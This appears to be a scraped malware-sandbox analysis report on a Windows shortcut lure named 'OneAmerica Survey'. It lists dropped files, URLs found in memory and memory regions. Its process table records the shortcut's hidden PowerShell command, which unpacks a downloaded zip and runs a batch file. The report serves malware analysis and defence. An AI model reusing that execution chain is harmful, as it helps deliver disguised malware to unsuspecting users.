Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
OneAmerica Survey lnk.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=216, Archive, ctime=Tue Sep 12 18:10:04 2023, mtime=Thu Dec 21 21:34:31 2023, atime=Tue Sep 12
18:10:04 2023, length=486400, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyrqzuer.eq2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uyecnetp.rge.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wuuvhwdn.vdc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyqbc0lb.vyo.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O9RHOHW2BOX1KIVUGZ25.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\c56dd8796a821e60.customDestinations-ms (copy)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -c Expand-Archive -Path $home\downloads\'OneAmerica
Survey.zip' -DestinationPath $home\datax; Invoke-Command {cmd.exe /c $home\datax\data\start.bat}
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c C:\Users\user\datax\data\start.bat
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 4 hidden URLs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFAAC84D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E102000
|
unkown
|
page readonly
|
||
|
7FFAACA60000
|
trusted library allocation
|
page read and write
|
||
|
2D8AA7B000
|
stack
|
page read and write
|
||
|
224049E3000
|
trusted library allocation
|
page read and write
|
||
|
22404865000
|
trusted library allocation
|
page read and write
|
||
|
2D8AAFF000
|
stack
|
page read and write
|
||
|
22401B05000
|
heap
|
page read and write
|
||
|
7FFAACB30000
|
trusted library allocation
|
page read and write
|
||
|
2240492D000
|
trusted library allocation
|
page read and write
|
||
|
22401895000
|
heap
|
page read and write
|
||
|
22401838000
|
heap
|
page read and write
|
||
|
7FFAACCB0000
|
trusted library allocation
|
page read and write
|
||
|
2241BD90000
|
trusted library allocation
|
page read and write
|
||
|
2AD2AD74000
|
heap
|
page read and write
|
||
|
22401808000
|
heap
|
page read and write
|
||
|
2D8BA8E000
|
stack
|
page read and write
|
||
|
2241BCB7000
|
heap
|
page read and write
|
||
|
7FFAAC843000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D8AFBC000
|
stack
|
page read and write
|
||
|
2AD2AFC4000
|
heap
|
page read and write
|
||
|
224018B5000
|
heap
|
page read and write
|
||
|
7FFAACAB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC960000
|
trusted library allocation
|
page execute and read and write
|
||
|
22413B2F000
|
trusted library allocation
|
page read and write
|
||
|
2241BB90000
|
heap
|
page read and write
|
||
|
7FFAACB40000
|
trusted library allocation
|
page read and write
|
||
|
224032B5000
|
heap
|
page read and write
|
||
|
2D8BB0E000
|
stack
|
page read and write
|
||
|
7FFAACCD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E0E1000
|
unkown
|
page execute read
|
||
|
224038C8000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB50000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC89C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D8A97D000
|
stack
|
page read and write
|
||
|
2AD2AE50000
|
heap
|
page read and write
|
||
|
22403E4A000
|
trusted library allocation
|
page read and write
|
||
|
224046B9000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC60000
|
trusted library allocation
|
page read and write
|
||
|
2240486B000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA50000
|
trusted library allocation
|
page read and write
|
||
|
2AD2AC80000
|
heap
|
page read and write
|
||
|
2D8B03E000
|
stack
|
page read and write
|
||
|
224043F2000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC860000
|
trusted library allocation
|
page read and write
|
||
|
224018E4000
|
heap
|
page read and write
|
||
|
22413841000
|
trusted library allocation
|
page read and write
|
||
|
22401899000
|
heap
|
page read and write
|
||
|
7FFAACAC0000
|
trusted library allocation
|
page read and write
|
||
|
22403660000
|
heap
|
page readonly
|
||
|
2240487D000
|
trusted library allocation
|
page read and write
|
||
|
22403A69000
|
trusted library allocation
|
page read and write
|
||
|
2241BC45000
|
heap
|
page read and write
|
||
|
7FFAACB94000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAA0000
|
trusted library allocation
|
page read and write
|
||
|
2241BCC3000
|
heap
|
page read and write
|
||
|
2241BA87000
|
heap
|
page execute and read and write
|
||
|
7FFAACB00000
|
trusted library allocation
|
page read and write
|
||
|
224032B0000
|
heap
|
page read and write
|
||
|
2240376A000
|
heap
|
page read and write
|
||
|
22413861000
|
trusted library allocation
|
page read and write
|
||
|
2D8AB7E000
|
stack
|
page read and write
|
||
|
7FFAAC8F6000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA80000
|
trusted library allocation
|
page read and write
|
||
|
7DF458280000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB1E0E0000
|
unkown
|
page readonly
|
||
|
2AD2AD5A000
|
heap
|
page read and write
|
||
|
7FFAACAD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBA8000
|
trusted library allocation
|
page read and write
|
||
|
224050A5000
|
trusted library allocation
|
page read and write
|
||
|
2AD2AFC0000
|
heap
|
page read and write
|
||
|
7FFAACC30000
|
trusted library allocation
|
page read and write
|
||
|
2AD2ABA0000
|
heap
|
page read and write
|
||
|
7FFAACA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACAE0000
|
trusted library allocation
|
page read and write
|
||
|
22403841000
|
trusted library allocation
|
page read and write
|
||
|
22404890000
|
trusted library allocation
|
page read and write
|
||
|
22404871000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC8FC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC842000
|
trusted library allocation
|
page read and write
|
||
|
2D8ABFA000
|
stack
|
page read and write
|
||
|
22403670000
|
trusted library allocation
|
page read and write
|
||
|
22401800000
|
heap
|
page read and write
|
||
|
2D8AE39000
|
stack
|
page read and write
|
||
|
22413B39000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
|
22403753000
|
heap
|
page read and write
|
||
|
7FFAACCA0000
|
trusted library allocation
|
page read and write
|
||
|
22404E70000
|
trusted library allocation
|
page read and write
|
||
|
2241BDB0000
|
heap
|
page read and write
|
||
|
2240505A000
|
trusted library allocation
|
page read and write
|
||
|
2D8AEBE000
|
stack
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page read and write
|
||
|
22401B00000
|
heap
|
page read and write
|
||
|
224037DE000
|
heap
|
page read and write
|
||
|
22404883000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC850000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC85B000
|
trusted library allocation
|
page read and write
|
||
|
22404877000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA30000
|
trusted library allocation
|
page execute and read and write
|
||
|
224138B2000
|
trusted library allocation
|
page read and write
|
||
|
224037D2000
|
heap
|
page read and write
|
||
|
224036F0000
|
trusted library allocation
|
page read and write
|
||
|
2241BA30000
|
heap
|
page execute and read and write
|
||
|
7FFAACB99000
|
trusted library allocation
|
page read and write
|
||
|
224053A6000
|
trusted library allocation
|
page read and write
|
||
|
2240485E000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBD0000
|
trusted library allocation
|
page read and write
|
||
|
22404974000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB10000
|
trusted library allocation
|
page read and write
|
||
|
22403620000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC80000
|
trusted library allocation
|
page read and write
|
||
|
22405212000
|
trusted library allocation
|
page read and write
|
||
|
22403830000
|
heap
|
page read and write
|
||
|
224037AC000
|
heap
|
page read and write
|
||
|
7FFAACA22000
|
trusted library allocation
|
page read and write
|
||
|
2D8A5F5000
|
stack
|
page read and write
|
||
|
2241BA80000
|
heap
|
page execute and read and write
|
||
|
22413B2B000
|
trusted library allocation
|
page read and write
|
||
|
22404858000
|
trusted library allocation
|
page read and write
|
||
|
22401920000
|
heap
|
page read and write
|
||
|
2240488A000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB70000
|
trusted library allocation
|
page read and write
|
||
|
7DF458270000
|
trusted library allocation
|
page execute and read and write
|
||
|
2241BCD5000
|
heap
|
page read and write
|
||
|
22404D54000
|
trusted library allocation
|
page read and write
|
||
|
2241BBE9000
|
heap
|
page read and write
|
||
|
2D8AC78000
|
stack
|
page read and write
|
||
|
7FFAACB73000
|
trusted library allocation
|
page read and write
|
||
|
22401812000
|
heap
|
page read and write
|
||
|
7FFAACC33000
|
trusted library allocation
|
page read and write
|
||
|
22405125000
|
trusted library allocation
|
page read and write
|
||
|
2D8B0BB000
|
stack
|
page read and write
|
||
|
224031E0000
|
heap
|
page read and write
|
||
|
22401710000
|
heap
|
page read and write
|
||
|
7FFAAC926000
|
trusted library allocation
|
page execute and read and write
|
||
|
224018DF000
|
heap
|
page read and write
|
||
|
7FFAACB20000
|
trusted library allocation
|
page read and write
|
||
|
C98C33D000
|
stack
|
page read and write
|
||
|
2241BC9E000
|
heap
|
page read and write
|
||
|
7FFB1E100000
|
unkown
|
page read and write
|
||
|
22401900000
|
heap
|
page read and write
|
||
|
2D8A9FE000
|
stack
|
page read and write
|
||
|
2240376C000
|
heap
|
page read and write
|
||
|
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
|
2D8ACBE000
|
stack
|
page read and write
|
||
|
22403810000
|
heap
|
page read and write
|
||
|
224050CA000
|
trusted library allocation
|
page read and write
|
||
|
2D8AD37000
|
stack
|
page read and write
|
||
|
22404B57000
|
trusted library allocation
|
page read and write
|
||
|
224018A3000
|
heap
|
page read and write
|
||
|
C98C6FF000
|
unkown
|
page read and write
|
||
|
7FFAAC844000
|
trusted library allocation
|
page read and write
|
||
|
2D8ADB9000
|
stack
|
page read and write
|
||
|
2AD2AFC5000
|
heap
|
page read and write
|
||
|
2AD2ACA0000
|
heap
|
page read and write
|
||
|
7FFAACC40000
|
trusted library allocation
|
page read and write
|
||
|
2D8AF3E000
|
stack
|
page read and write
|
||
|
2241BBE1000
|
heap
|
page read and write
|
||
|
7FFAACB60000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC840000
|
trusted library allocation
|
page read and write
|
||
|
224018DD000
|
heap
|
page read and write
|
||
|
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
|
2D8A8FE000
|
stack
|
page read and write
|
||
|
7FFAAC9FA000
|
trusted library allocation
|
page read and write
|
||
|
22405470000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA00000
|
trusted library allocation
|
page execute and read and write
|
||
|
22403730000
|
heap
|
page read and write
|
||
|
2241B842000
|
heap
|
page read and write
|
||
|
2D8A87E000
|
stack
|
page read and write
|
||
|
22403758000
|
heap
|
page read and write
|
||
|
22401AE0000
|
heap
|
page read and write
|
||
|
224036B0000
|
heap
|
page execute and read and write
|
||
|
22413871000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
|
2240375F000
|
heap
|
page read and write
|
||
|
22403839000
|
heap
|
page read and write
|
||
|
2241BAB0000
|
heap
|
page read and write
|
||
|
7FFAACA70000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACA40000
|
trusted library allocation
|
page read and write
|
||
|
224050C7000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC90000
|
trusted library allocation
|
page read and write
|
||
|
22403650000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACAF0000
|
trusted library allocation
|
page read and write
|
||
|
22403756000
|
heap
|
page read and write
|
||
|
7FFB1E105000
|
unkown
|
page readonly
|
||
|
2240546C000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC9F1000
|
trusted library allocation
|
page read and write
|
||
|
2241BA90000
|
heap
|
page read and write
|
||
|
22403777000
|
heap
|
page read and write
|
||
|
7FFAAC8F0000
|
trusted library allocation
|
page read and write
|
||
|
2AD2AD50000
|
heap
|
page read and write
|
||
|
7FFB1E0F6000
|
unkown
|
page readonly
|
||
|
7DF458290000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACC70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACBAC000
|
trusted library allocation
|
page read and write
|
There are 188 hidden memdumps, click here to show them.